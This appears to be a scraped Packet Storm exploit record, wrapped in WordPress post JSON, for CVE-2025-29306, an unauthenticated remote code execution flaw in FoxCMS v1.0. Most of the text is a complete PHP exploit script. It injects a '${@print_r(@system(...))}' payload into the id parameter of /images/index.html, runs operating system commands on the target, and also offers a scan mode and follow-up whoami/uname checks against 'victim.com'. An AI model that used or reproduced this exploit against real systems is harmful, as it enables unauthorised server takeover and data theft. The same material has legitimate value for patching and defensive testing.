{“lastseen”:”2025-12-15T16:52:10″,”description”:”FoxCMS version 1.0 proof of concept remote code injection exploit…”,”published”:”2025-12-15T00:00:00″,”modified”:”2025-12-15T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 FoxCMS 1.0 Code Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:212824″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-29306″],”sourceData”:”=============================================================================================================================================\\n | # Title : FoxCMS v1.0 php code innjection |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/sourceforge.net\/projects\/fox-cms\/ |\\n =============================================================================================================================================\\n \\n POC : \\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/190551\/ \\u0026 CVE-2025-29306\\n \\n \\n [+] Summary\\n \\n A critical remote code execution vulnerability exists in FoxCMS v1.0 that allows unauthenticated attackers to execute arbitrary operating system commands \\n \\tvia the ‘id’ parameter in the \/images\/index.html endpoint. \\n \\tThe vulnerability stems from improper input sanitization and direct code evaluation.\\n \\t\\n \\tThe vulnerability exists in the FoxCMS v1.0 \/images\/index.html endpoint where user-supplied input in the ‘id’ parameter is directly evaluated without proper sanitization. \\n \\tThe system fails to validate and sanitize user input, allowing attackers to inject and execute arbitrary PHP code.\\n \\n [+] Vulnerable Code Pattern:\\n \\n “`php\\n \\n \/\/ In \/images\/index.html or related component\\n \\n \\u003c?php\\n \/\/ Vulnerable code structure (reconstructed)\\n $user_input = $_GET[‘id’];\\n \/\/ Input is directly evaluated without sanitization\\n eval(\\”some_function($user_input);\\”);\\n \/\/ Or similar dangerous construct\\n ?\\u003e\\n \\n [+] Usage: \\n \\n Usage: php exploit.php https:\/\/victim.com \\”id\\”\\n \\n [+] POC :\\n \\n \\u003c?php\\n \/**\\n * CVE-2025-29306 Exploit – FoxCMS v1.0 Remote Code Execution\\n * By: indoushka\\n * Vulnerability: RCE via \/images\/index.html id parameter\\n *\/\\n \\n class FoxCMSExploit {\\n private $colors;\\n \\n public function __construct() {\\n $this-\\u003ecolors = [\\n ‘RED’ =\\u003e \\”\\\\033[91m\\”,\\n ‘GREEN’ =\\u003e \\”\\\\033[92m\\”,\\n ‘YELLOW’ =\\u003e \\”\\\\033[93m\\”,\\n ‘BLUE’ =\\u003e \\”\\\\033[94m\\”,\\n ‘MAGENTA’ =\\u003e \\”\\\\033[95m\\”,\\n ‘CYAN’ =\\u003e \\”\\\\033[96m\\”,\\n ‘WHITE’ =\\u003e \\”\\\\033[97m\\”,\\n ‘BOLD’ =\\u003e \\”\\\\033[1m\\”,\\n ‘RESET’ =\\u003e \\”\\\\033[0m\\”\\n ];\\n }\\n \\n private function color($text, $color) {\\n return $this-\\u003ecolors[$color] . $text . $this-\\u003ecolors[‘RESET’];\\n }\\n \\n private function showBanner() {\\n $banner = $this-\\u003ecolor(\\”\\n \\n \\”, ‘CYAN’) . \\n $this-\\u003ecolor(\\”\\n \\n \\”, ‘MAGENTA’) .\\n $this-\\u003ecolor(\\”\\\\n CVE-2025-29306 – FoxCMS v1.0 RCE Exploit\\\\n\\”, ‘RED’) .\\n $this-\\u003ecolor(\\” @indoushka\\\\n\\\\n\\”, ‘WHITE’);\\n \\n echo $banner;\\n }\\n \\n private function makeRequest($url) {\\n $context = stream_context_create([\\n ‘http’ =\\u003e [\\n ‘timeout’ =\\u003e 10,\\n ‘ignore_errors’ =\\u003e true,\\n ‘user_agent’ =\\u003e ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’\\n ],\\n ‘ssl’ =\\u003e [\\n ‘verify_peer’ =\\u003e false,\\n ‘verify_peer_name’ =\\u003e false\\n ]\\n ]);\\n \\n $response = @file_get_contents($url, false, $context);\\n \\n if ($response === false) {\\n return [‘success’ =\\u003e false, ‘error’ =\\u003e ‘Request failed’];\\n }\\n \\n return [‘success’ =\\u003e true, ‘content’ =\\u003e $response];\\n }\\n \\n private function extractCommandOutput($html) {\\n \/\/ Try multiple extraction methods\\n $output = ”;\\n \\n \/\/ Method 1: Simple tag stripping\\n $cleaned = strip_tags($html);\\n \\n \/\/ Method 2: Look for command output patterns\\n if (preg_match(‘\/\\u003cul[^\\u003e]*\\u003e(.*?)\\u003c\\\\\/ul\\u003e\/si’, $html, $matches)) {\\n $output = strip_tags($matches[1]);\\n }\\n \\n \/\/ Method 3: Extract between common output markers\\n if (preg_match(‘\/\\\\b(root|bin|daemon|system)\\\\b\/i’, $cleaned)) {\\n $output = $cleaned;\\n }\\n \\n \/\/ Clean up the output\\n $output = preg_replace(‘\/\\\\s+\/’, ‘ ‘, $output);\\n $output = trim($output);\\n \\n return $output ?: $cleaned;\\n }\\n \\n public function execute($target, $command) {\\n $this-\\u003eshowBanner();\\n \\n echo $this-\\u003ecolor(\\”[*] Target: \\”, ‘BLUE’) . $target . \\”\\\\n\\”;\\n echo $this-\\u003ecolor(\\”[*] Command: \\”, ‘BLUE’) . $command . \\”\\\\n\\\\n\\”;\\n \\n \/\/ Construct the exploit URL\\n $payload = ‘${@print_r(@system(\\”‘ . $command . ‘\\”))}’;\\n $encodedPayload = urlencode($payload);\\n \\n $exploitUrl = rtrim($target, ‘\/’) . ‘\/images\/index.html?id=’ . $encodedPayload;\\n \\n echo $this-\\u003ecolor(\\”[*] Sending RCE payload…\\”, ‘YELLOW’) . \\”\\\\n\\”;\\n echo $this-\\u003ecolor(\\”[*] Exploit URL: \\”, ‘CYAN’) . $exploitUrl . \\”\\\\n\\\\n\\”;\\n \\n $response = $this-\\u003emakeRequest($exploitUrl);\\n \\n if (!$response[‘success’]) {\\n echo $this-\\u003ecolor(\\”[!] Request failed: \\” . $response[‘error’], ‘RED’) . \\”\\\\n\\”;\\n return;\\n }\\n \\n $output = $this-\\u003eextractCommandOutput($response[‘content’]);\\n \\n if (empty(trim($output))) {\\n echo $this-\\u003ecolor(\\”[!] No command output received\\”, ‘RED’) . \\”\\\\n\\”;\\n echo $this-\\u003ecolor(\\”[*] Response preview:\\”, ‘YELLOW’) . \\”\\\\n\\”;\\n echo substr($response[‘content’], 0, 500) . \\”\\\\n\\\\n\\”;\\n } else {\\n echo $this-\\u003ecolor(\\”[+] Command output:\\”, ‘GREEN’) . \\”\\\\n\\”;\\n echo $this-\\u003ecolor(str_repeat(\\”=\\”, 60), ‘CYAN’) . \\”\\\\n\\”;\\n echo $output . \\”\\\\n\\”;\\n echo $this-\\u003ecolor(str_repeat(\\”=\\”, 60), ‘CYAN’) . \\”\\\\n\\”;\\n }\\n \\n \/\/ Test additional commands for verification\\n $this-\\u003etestAdditionalCommands($target);\\n }\\n \\n private function testAdditionalCommands($target) {\\n echo $this-\\u003ecolor(\\”\\\\n[*] Testing additional verification commands…\\”, ‘YELLOW’) . \\”\\\\n\\”;\\n \\n $testCommands = [\\n ‘whoami’ =\\u003e ‘Current user’,\\n ‘pwd’ =\\u003e ‘Current directory’,\\n ‘uname -a’ =\\u003e ‘System information’\\n ];\\n \\n foreach ($testCommands as $cmd =\\u003e $description) {\\n $payload = ‘${@print_r(@system(\\”‘ . $cmd . ‘\\”))}’;\\n $encodedPayload = urlencode($payload);\\n $testUrl = rtrim($target, ‘\/’) . ‘\/images\/index.html?id=’ . $encodedPayload;\\n \\n $response = $this-\\u003emakeRequest($testUrl);\\n if ($response[‘success’]) {\\n $output = $this-\\u003eextractCommandOutput($response[‘content’]);\\n if (!empty(trim($output))) {\\n echo $this-\\u003ecolor(\\”[+] $description: \\”, ‘GREEN’) . trim($output) . \\”\\\\n\\”;\\n }\\n }\\n }\\n }\\n \\n public function scan($target) {\\n $this-\\u003eshowBanner();\\n \\n echo $this-\\u003ecolor(\\”[*] Scanning target for FoxCMS vulnerability: \\”, ‘BLUE’) . $target . \\”\\\\n\\\\n\\”;\\n \\n $testUrl = rtrim($target, ‘\/’) . ‘\/images\/index.html’;\\n \\n \/\/ First check if endpoint exists\\n echo $this-\\u003ecolor(\\”[*] Checking if \/images\/index.html exists…\\”, ‘YELLOW’) . \\”\\\\n\\”;\\n $response = $this-\\u003emakeRequest($testUrl);\\n \\n if (!$response[‘success’]) {\\n echo $this-\\u003ecolor(\\”[-] Endpoint not accessible\\”, ‘RED’) . \\”\\\\n\\”;\\n return false;\\n }\\n \\n echo $this-\\u003ecolor(\\”[+] Endpoint is accessible\\”, ‘GREEN’) . \\”\\\\n\\”;\\n \\n \/\/ Test with simple command\\n $testCommand = ‘echo \\”VULNERABLE\\”‘;\\n $payload = ‘${@print_r(@system(\\”‘ . $testCommand . ‘\\”))}’;\\n $encodedPayload = urlencode($payload);\\n \\n $exploitUrl = $testUrl . ‘?id=’ . $encodedPayload;\\n \\n echo $this-\\u003ecolor(\\”[*] Testing for RCE vulnerability…\\”, ‘YELLOW’) . \\”\\\\n\\”;\\n $response = $this-\\u003emakeRequest($exploitUrl);\\n \\n if ($response[‘success’] \\u0026\\u0026 strpos($response[‘content’], ‘VULNERABLE’) !== false) {\\n echo $this-\\u003ecolor(\\”[+] Target is VULNERABLE to CVE-2025-29306!\\”, ‘RED’) . \\”\\\\n\\”;\\n return true;\\n } else {\\n echo $this-\\u003ecolor(\\”[-] Target does not appear to be vulnerable\\”, ‘GREEN’) . \\”\\\\n\\”;\\n return false;\\n }\\n }\\n }\\n \\n \/\/ Main execution\\n if (php_sapi_name() === ‘cli’) {\\n if ($argc \\u003c 2) {\\n echo \\”CVE-2025-29306 – FoxCMS v1.0 RCE Exploit\\\\n\\”;\\n echo \\”Usage:\\\\n\\”;\\n echo \\” php exploit.php \\u003ctarget_url\\u003e [command]\\\\n\\”;\\n echo \\” php exploit.php \\u003ctarget_url\\u003e –scan\\\\n\\”;\\n echo \\”\\\\nExamples:\\\\n\\”;\\n echo \\” php exploit.php https:\/\/victim.com \\\\\\”id\\\\\\”\\\\n\\”;\\n echo \\” php exploit.php https:\/\/victim.com \\\\\\”ls -la\\\\\\”\\\\n\\”;\\n echo \\” php exploit.php https:\/\/victim.com –scan\\\\n\\”;\\n echo \\”\\\\nDescription:\\\\n\\”;\\n echo \\” Exploits RCE vulnerability in FoxCMS v1.0 via \/images\/index.html id parameter\\\\n\\”;\\n exit(1);\\n }\\n \\n $target = $argv[1];\\n $command = $argv[2] ?? ‘–scan’;\\n \\n if (!filter_var($target, FILTER_VALIDATE_URL)) {\\n echo \\”Error: Invalid target URL\\\\n\\”;\\n exit(1);\\n }\\n \\n $exploit = new FoxCMSExploit();\\n \\n if ($command === ‘–scan’) {\\n $exploit-\\u003escan($target);\\n } else {\\n $exploit-\\u003eexecute($target, $command);\\n }\\n } else {\\n echo \\”This script is intended for command line use only.\\\\n\\”;\\n }\\n ?\\u003e\\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212824″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212824\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-15T16:52:10″,”description”:”FoxCMS version 1.0 proof of concept remote code injection exploit…”,”published”:”2025-12-15T00:00:00″,”modified”:”2025-12-15T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 FoxCMS 1.0 Code Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:212824″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-29306″],”sourceData”:”=============================================================================================================================================\\n | # Title : FoxCMS v1.0 php code innjection |\\n |…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-31171","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n